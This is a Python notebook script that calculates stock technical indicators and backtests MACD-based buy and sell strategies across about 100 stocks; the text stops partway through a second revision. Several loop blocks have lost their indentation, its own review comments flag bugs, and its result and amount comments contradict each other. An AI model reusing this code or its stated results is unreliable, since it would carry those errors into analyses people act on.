    """Band-pass filter ``data`` along axis 0.

    Designs the filter with :func:`butter_bandpass` (cutoffs in Hz,
    sampling rate ``fs``) and applies it causally with
    :func:`scipy.signal.lfilter`.
    """
    coeff_b, coeff_a = butter_bandpass(lowcut, highcut, fs, order=order)
    return lfilter(coeff_b, coeff_a, data, axis=0)
# +
from scipy.ndimage import gaussian_filter1d
# gaussian_filter1d?
# sort the values based on Symbol and Date
daily_data = temp_df.sort_values(by=['Symbol', 'Date'], ignore_index=True)
# reset the index
# (redundant after ignore_index=True above, but harmless)
daily_data.reset_index(drop=True, inplace=True)
# observe the rows where the symbols change - to ensure sorting has worked correctly
daily_data.head(2710)
# to calculate the simple moving average - 5, 10 , 50, 100, 200 days
# (rolling mean of Close within each Symbol group; first window-1 rows per
# symbol are NaN)
daily_data['SMA-5'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=5).mean())
daily_data['SMA-10'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=10).mean())
daily_data['SMA-50'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=50).mean())
daily_data['SMA-100'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=100).mean())
daily_data['SMA-200'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=200).mean())
# #### WHILE TA-LIB WAS USED, IT ENDED UP CONSUMING A LOT OF MEMORY STORAGE AND HENCE DID NOT RUN IN THE FINAL VERSION BUT THE CODE TO USE TA-LIB AND GET KPIs IS AS BELOW
# import talib so that we can check if we get KPIs
#pip install TA_Lib-0.4.19-cp37-cp37m-win_amd64.whl # installed manually on anaconda prompt after downloading whl file into the python folder
import talib
# +
# calculate SMA using TA LIB
## SMA-5
df1_grouped = daily_data.groupby('Symbol')
SMA = [0]
for group_keys, df_group in df1_grouped:
SMA.append(talib.SMA(df_group['Close'], timeperiod = 5))
dataframe_SMA = pd.concat([pd.Series(x) for x in SMA], axis=0)
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_SMA_corrected = dataframe_SMA[1:]
# add the SMA value to the existing daily_data dataframe
daily_data['talib-SMA-5'] = dataframe_SMA_corrected.values
## SMA-10
#df1_grouped = daily_data.groupby('Symbol')
SMA = [0]
for group_keys, df_group in df1_grouped:
SMA.append(talib.SMA(df_group['Close'], timeperiod = 10))
dataframe_SMA = pd.concat([pd.Series(x) for x in SMA], axis=0)
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_SMA_corrected = dataframe_SMA[1:]
# add the SMA value to the existing daily_data dataframe
daily_data['talib-SMA-10'] = dataframe_SMA_corrected.values
daily_data.head(2670)
## SMA-50
#df1_grouped = daily_data.groupby('Symbol')
SMA = [0]
for group_keys, df_group in df1_grouped:
SMA.append(talib.SMA(df_group['Close'], timeperiod = 50))
dataframe_SMA = pd.concat([pd.Series(x) for x in SMA], axis=0)
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_SMA_corrected = dataframe_SMA[1:]
# add the SMA value to the existing daily_data dataframe
daily_data['talib-SMA-50'] = dataframe_SMA_corrected.values
daily_data.head(2670)
## SMA-100
#df1_grouped = daily_data.groupby('Symbol')
SMA = [0]
for group_keys, df_group in df1_grouped:
SMA.append(talib.SMA(df_group['Close'], timeperiod = 100))
dataframe_SMA = pd.concat([pd.Series(x) for x in SMA], axis=0)
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_SMA_corrected = dataframe_SMA[1:]
# add the SMA value to the existing daily_data dataframe
daily_data['talib-SMA-100'] = dataframe_SMA_corrected.values
daily_data.head(2670)
## SMA-200
#df1_grouped = daily_data.groupby('Symbol')
SMA = [0]
for group_keys, df_group in df1_grouped:
SMA.append(talib.SMA(df_group['Close'], timeperiod = 200))
dataframe_SMA = pd.concat([pd.Series(x) for x in SMA], axis=0)
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_SMA_corrected = dataframe_SMA[1:]
# add the SMA value to the existing daily_data dataframe
daily_data['talib-SMA-200'] = dataframe_SMA_corrected.values
daily_data.head(2670)
# -
# #### END OF USAGE OF TA-LIB
# to calculate the exponential moving average - 5, 10 , 50, 100, 200 days
# (span-based ewm of Close, computed independently per Symbol)
daily_data['EMA-5'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=5).mean())
daily_data['EMA-10'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=10).mean())
daily_data['EMA-50'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=50).mean())
daily_data['EMA-100'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=100).mean())
daily_data['EMA-200'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=200).mean())
# calculcate RSI - Relative strength index
# day-over-day Close change, computed per Symbol
change = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.diff())
gain = change.mask(change < 0, 0)   # keep only positive moves
loss = change.mask (change > 0, 0)  # keep only negative moves
# NOTE(review): the 14-day rolling means below run over the WHOLE series,
# not per Symbol, so the first ~14 rows of each stock mix in the previous
# stock's values — confirm this is intended.
average_gain= gain.rolling(window = 14).mean().shift()
average_loss= loss.rolling(window = 14).mean().shift()
relativestrength = abs(average_gain / average_loss)
rsi = 100 - (100/(1+relativestrength))
daily_data['rsi'] = rsi.shift(-1) # move up since the current column is already on next row due to rolling function
# calculate MACD
# MACD = 12-day EMA - 26-day EMA
daily_data['ema12'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=12).mean())
daily_data['ema26'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=26).mean())
daily_data['macd'] = daily_data['ema12'] - daily_data['ema26']
## for cross over - calculate macd9
# 9-day EMA of the MACD line (the "signal" line)
daily_data['macd9'] = daily_data.groupby('Symbol')['macd'].transform(lambda x:x.ewm(span=9).mean())
# calculate bollinger band
# middle band = 20-day SMA; upper/lower = middle +/- 2 standard deviations
daily_data['SMA-20'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=20).mean())
daily_data['stddev-20'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=20).std())
daily_data['Bollinger-UpperBand'] = daily_data['SMA-20'] + 2*daily_data['stddev-20']
daily_data['Bollinger-LowerBand'] = daily_data['SMA-20'] - 2*daily_data['stddev-20']
# Calculate the OBV - based on price change, denote whether the volume needs to be added or subtracted in a new column - store it as list in OBV
# On-Balance Volume building blocks: +Volume on an up day, -Volume on a
# down day, 0 when unchanged; each symbol's first day contributes its
# full volume.
df1_grouped = daily_data.groupby('Symbol')
OBV = [0]
for group_keys, df_group in df1_grouped:
    i = 0
    for row_index, row in df_group.iterrows():
        # NOTE(review): `row_index - 1` assumes the contiguous integer
        # index produced by the earlier reset_index; and the guard below
        # compares the within-group counter i against the group's LAST
        # index label, so it is effectively always true — confirm intent.
        if i <= df_group.index[-1] :
            if i == 0 :
                OBV.append(df_group.loc[row_index, 'Volume'])
            else :
                if df_group.loc[row_index, 'Close'] > df_group.loc[row_index - 1, 'Close'] :
                    OBV.append(df_group.loc[row_index, 'Volume'])
                if df_group.loc[row_index, 'Close'] == df_group.loc[row_index - 1, 'Close'] :
                    OBV.append(0)
                if df_group.loc[row_index, 'Close'] < df_group.loc[row_index - 1, 'Close'] :
                    OBV.append(-df_group.loc[row_index, 'Volume'])
        i = i + 1
# convert the series to dataframe with column as OBV
dataframe_OBV = pd.DataFrame(OBV,columns=['OBV'])
dataframe_OBV
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_OBV_corrected = dataframe_OBV[1:]
dataframe_OBV_corrected.tail()
# add the non-cumulative OBV value to the existing daily_data dataframe
daily_data['OBV Non-Cum'] = dataframe_OBV_corrected['OBV'].values
dataframe_OBV_corrected
daily_data.head(2670)
# do the cumulative sum based on the grouping iof each symbol to get the OBV for each Symbol
daily_data['OBV'] = daily_data.groupby('Symbol')['OBV Non-Cum'].cumsum()
daily_data.head(2710)
daily_data.isnull().sum()
# determine Bearish or Bullish market and the trade strategy based on macd and macd9
# if macd > macd9, "bullish" and "buy"
# if macd < macd9, "bearish" and "sell"
daily_data['TradingStrategymacd'] = np.where(daily_data['macd'] > daily_data['macd9'], "Buy", "Sell")
# determine the trading strategy for Bollinger
# Buy - first trade confirmation we need is for the price to break and close above the middle Bollinger band
# Sell - Close price drops from a Buy region of y/day to below the middle Bollinger band
daily_data['TradingStrategyBollinger'] = np.where(daily_data['Close'] >= daily_data['SMA-20'], "Buy", "Sell")
# determine the trading strategy for RSI
# RSI reading above the 50 level is considered as a positive momentum
# RSI reading below the 50 level is considered negative momentum
daily_data['TradingStrategyRSI'] = np.where(daily_data['rsi'] > 50, "positive", "negative")
# determine the trading strategy for OBV
# Buy at the market once you see volume confirming the price
# (OBV rising vs the previous row AND positive)
# NOTE(review): .shift(1) is not grouped by Symbol, so the first row of
# each stock compares against the previous stock's OBV — confirm intent.
daily_data['TradingStrategyOBV'] = np.where((daily_data['OBV'] > daily_data['OBV'].shift(1)) & (daily_data['OBV'] > 0), "Buy", "Sell")
# +
# HIDE THE PROTECTIVE STOP LOSS BELOW THE BOLLINGER BAND
# The logical place to hide your protective stop loss is below the lower Bollinger band.
# A break below the lower BB will invalidate our trade idea, and we want to minimize our losses.
# STRATEGY FOR EXIT FROM THE MARKET (MAKE A SELL DECISION)
# A break below the lower Bollinger Band is a good signal for a possible reversal, so cash out profits
daily_data['STOP'] = np.where((daily_data['Close'] < daily_data['Bollinger-LowerBand']), "STOP", "WAIT")
# +
# COMBINED STRATEGY TO ENTER THE MARKET (MAKE A BUY DECISION)
# Step #1: Price needs to Break and Close above the middle Bollinger Band
# Step #2: Wait for the RSI indicator to trade above the 50 level if it doesn’t already
# Step #3: Wait for the OBV indicator to rise. Buy at the market once you see volume confirming the price
# HIDE THE PROTECTIVE STOP LOSS BELOW THE BOLLINGER BAND
# The logical place to hide your protective stop loss is below the lower Bollinger band.
# A break below the lower BB will invalidate our trade idea, and we want to minimize our losses.
# STRATEGY FOR EXIT FROM THE MARKET (MAKE A SELL DECISION)
# A break below the lower Bollinger Band is a good signal for a possible reversal, so we want to cash out our profits
df1_grouped = daily_data.groupby('Symbol')
COMBINED = [0]  # seeded with a dummy 0 that is dropped again further below
for group_keys, df_group in df1_grouped:
    i = 0
    for row_index, row in df_group.iterrows():
        if i <= df_group.index[-1] :
            if i == 0 :
                # no history on a symbol's first day -> WAIT
                COMBINED.append("WAIT")
            else:
                # ENTER only when all three indicators agree (Bollinger
                # breakout + positive RSI momentum + rising OBV)
                if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
                    if df_group.loc[row_index, 'TradingStrategyRSI'] == "positive":
                        if df_group.loc[row_index, 'TradingStrategyOBV'] == "Buy":
                            COMBINED.append("ENTER")
                        else:
                            COMBINED.append("SELL")
                    else:
                        COMBINED.append("SELL")
                else:
                    COMBINED.append("WAIT")
        i = i + 1
# -
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data['TradingStrategyCombined'] = dataframe_COMBINED_corrected['COMBINED'].values
# # STOCK - BACK TESTING UNTIL 28-AUG-2020 (10 YEARS)
## FOR BACK-TESTING FOR THE PERIOD FROM START UNTIL 31-AUG-2020
## SELECT THE DAILY_DATA TO REFLECT JUST THIS DATA AND NOT THE DATA FROM 01-SEP-2020
mask = (daily_data['Date'] <= "2020-08-28")
daily_data_back_test = daily_data[mask]
daily_data_back_test.head(2648)
# +
# BACK-TESTING FOR 10 YEARS - DAILY DATA - ACROSS ALL STOCKS
# MACD - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# For each symbol: alternate Buy -> Sell on the MACD signal, buying as many
# whole shares as the cash balance allows, and log every transaction as 5
# flat fields (Date, Symbol, Txn, Price, Qty) appended to Back_Test_10yrs.
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs = []
for group_keys, df_group in df1_grouped:
    i = 0 # for each group_key or Symbol
    j = 0 # for each row in the symbol
    number_stock = 0
    # NOTE(review): 10,000 per stock x 100 stocks = the 10 lakh total
    # mentioned above — confirm the per-stock allocation is intended.
    money = 10000 # investment of 10 lakhs over 100 stocks
    next_step = 1 # 1 - Buy, 0 - Sell
    for row_index, row in df_group.iterrows():
        if i <= df_group.index[-1] :
            if next_step == 0:
                # currently holding -> look for a Sell signal
                if df_group.loc[row_index, 'TradingStrategymacd'] == "Sell":
                    Back_Test_10yrs.append(row['Date'])
                    Back_Test_10yrs.append(row['Symbol'])
                    Back_Test_10yrs.append("Sell")
                    Back_Test_10yrs.append(row['Close'])
                    Back_Test_10yrs.append(number_stock)
                    money = money + row['Close'] * number_stock
                    next_step = 1
                    j = j + 1
            else: # first time I have to buy
                if df_group.loc[row_index, 'TradingStrategymacd'] == "Buy":
                    number_stock = money // row['Close'] # floor division to get the integer number of stocks
                    if number_stock > 0:
                        Back_Test_10yrs.append(row['Date'])
                        Back_Test_10yrs.append(row['Symbol'])
                        Back_Test_10yrs.append("Buy")
                        Back_Test_10yrs.append(row['Close'])
                        Back_Test_10yrs.append(number_stock)
                        money = money - row['Close'] * number_stock
                        next_step = 0
                        j = j + 1
        i = i + 1
# -
def divide_chunks(seq, n):
    """Yield successive ``n``-sized slices of ``seq``.

    The last chunk may be shorter when ``len(seq)`` is not a multiple of
    ``n``.  The parameter was renamed from ``list`` so the builtin is no
    longer shadowed; all existing call sites pass it positionally.
    """
    # loop over the start index of each chunk
    for start in range(0, len(seq), n):
        yield seq[start:start + n]
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list = list(divide_chunks(Back_Test_10yrs, n))
# move the list to dataframe
Buy_Sell_dataframe = []
Buy_Sell_dataframe = pd.DataFrame(Buy_Sell_list)
Buy_Sell_dataframe.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe ['Value'] = Buy_Sell_dataframe ['Price'] * Buy_Sell_dataframe ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe[Buy_Sell_dataframe.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
Buy_Sell_dataframe
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe.shape[0]
for index_row, row in Buy_Sell_dataframe.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe, add_rows_df])
# -
Buy_Sell_Consolidated = []
# total transacted Value per (Symbol, transaction type)
Buy_Sell_Consolidated = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# NOTE(review): the groupby sum above returns a Series, so assigning
# .columns here has no effect on the data.
Buy_Sell_Consolidated.columns = ['Symbol', 'Txn', 'Cum Value']
# Sumarize in a dataframe
# per-symbol Sell-minus-Buy difference ("Buy" sorts before "Sell", so
# diff() yields Sell - Buy); .mul(100) scales it — TODO confirm the unit.
Buy_Sell_Summary = pd.DataFrame(Buy_Sell_Consolidated.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# +
# seed the report frames with a single placeholder row
# NOTE(review): the 'temp' placeholder rows are never removed and will
# still be present in the final reports after the concats below.
c = [['temp','temp','temp','temp',0,0]]
Consolidated_Report_df = pd.DataFrame(c, columns=['Stock/Index', 'KPI', 'Criteria', 'Transaction', 'Value', 'Number of Txns'])
s = [['temp','temp','temp',0,0,0,0]]
Summary_Report_df = pd.DataFrame(s, columns=['Stock/Index', 'KPI', 'Criteria', 'Net Profit/Loss', 'Investment', 'Number of Txns', 'ROI'])
c = [['temp','temp','temp','temp', 'temp',0,0]]
Consolidated_Report_df2 = pd.DataFrame(c, columns=['Stock/Index', 'KPI', 'Criteria', 'Week#', 'Transaction', 'Value', 'Number of Txns'])
s = [['temp','temp','temp',0,0,0,0]]
Summary_Report_df2 = pd.DataFrame(s, columns=['Stock/Index', 'KPI', 'Criteria', 'Net Profit/Loss', 'Investment', 'Number of Txns', 'ROI'])
# -
## SUMMARIZE FOR REPORTING for BACKTESTING
def Summarize_Report (stock_index, kpi, criteria, temp_data, investment_amount=None):
    """Summarise a back-testing transaction log for one KPI run.

    Parameters
    ----------
    stock_index : str
        Label for the instrument universe (e.g. "Stock").
    kpi : str
        Indicator that generated the signals (e.g. "macd").
    criteria : str
        Parameterisation of the KPI (e.g. "(12-26)-9").
    temp_data : pandas.DataFrame
        Transaction log with at least 'Txn' and 'Value' columns.  As in
        the original row-wise logic, 'Txn' == "Buy" counts as a buy and
        anything else counts as a sell.
    investment_amount : float, optional
        Capital used as the ROI denominator.  Defaults to the
        module-level ``investment`` global, keeping existing call sites
        (which set ``investment`` before calling) working unchanged.

    Returns
    -------
    (pandas.DataFrame, pandas.DataFrame)
        A two-row Buy/Sell consolidation and a one-row summary with net
        profit/loss and ROI (in percent).
    """
    inv = investment if investment_amount is None else investment_amount

    # Vectorised replacement for the original iterrows() accumulation:
    # one boolean mask, two sums, two counts.
    is_buy = temp_data['Txn'] == "Buy"
    buy_value = temp_data.loc[is_buy, 'Value'].sum()
    buy_count = int(is_buy.sum())
    sell_value = temp_data.loc[~is_buy, 'Value'].sum()
    sell_count = int((~is_buy).sum())

    # Consolidated report: one row per transaction type, same columns and
    # row order (Buy first, then Sell) as the original list/chunk build.
    temp1_df = pd.DataFrame(
        [[stock_index, kpi, criteria, "Buy", buy_value, buy_count],
         [stock_index, kpi, criteria, "Sell", sell_value, sell_count]],
        columns=['Stock/Index', 'KPI', 'Criteria', 'Transaction', 'Value', 'Number of Txns'])

    # calculate net profit (Sell - Buy)
    profit_loss = sell_value - buy_value  ### NET PROFIT OR LOSS FOR THE INVESTMENT MADE
    roi = (profit_loss / inv) * 100
    temp2_df = pd.DataFrame(
        [[stock_index, kpi, criteria, profit_loss, inv, sell_count, roi]],
        columns=['Stock/Index', 'KPI', 'Criteria', 'Net Profit/Loss', 'Investment', 'Number of Txns', 'ROI'])

    return temp1_df, temp2_df
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary['Value'].gt(0).sum().sum()
#Buy_Sell_Summary['Value'].sum()
# total capital used as the ROI denominator inside Summarize_Report
investment = 1000000 # investment of 10 lakhs
# summarise the (12-26)-9 MACD back-test and append to the running reports
temp1_df, temp2_df = Summarize_Report("Stock", "macd", "(12-26)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(10)
Summary_Report_df.head(10)
# number of positives we got is 69 out of 100 and a significant gain.
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\MACD Buy_Sell12-26.csv')
# +
# REVISION BASED ON BACK-TESTING FOR MACD STRATEGY
# try with 5, 20 for macd instead of 12, 26 used. Then compare this outcome against macd9 and determine the buy/sell call
# Then do the back-testing to check if this strategy helps get a better nunber of positive from the current 52
# Calculate revised MACD
# Revised MACD = 5-day EMA - 20-day EMA
daily_data_back_test['ema5'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=5).mean())
daily_data_back_test['ema20'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=20).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema5'] - daily_data_back_test['ema20']
## for cross over - calculate macd9
daily_data_back_test['macd9'] = daily_data_back_test.groupby('Symbol')['macd_revised'].transform(lambda x:x.ewm(span=9).mean())
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
# +
# BACK-TESTING FOR 10 YEARS - DAILY DATA - ACROSS ALL STOCKS
# MACD REVISED - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "macd", "(5-20)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(10)
Summary_Report_df.head(10)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
# +
# REVISION2 BASED ON BACK-TESTING FOR MACD STRATEGY
# try with 4, 15 for macd instead of 5, 20 used. Then compare this outcome against macd9 and determine the buy/sell call
# Then do the back-testing to check if this strategy helps get a better nunber of positive from the current 55
# Calculate revised MACD
# Revised MACD = 4-day EMA - 15-day EMA
daily_data_back_test['ema4'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
# BACK-TESTING FOR 10 YEARS - DAILY DATA - ACROSS ALL STOCKS
# MACD REVISED - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
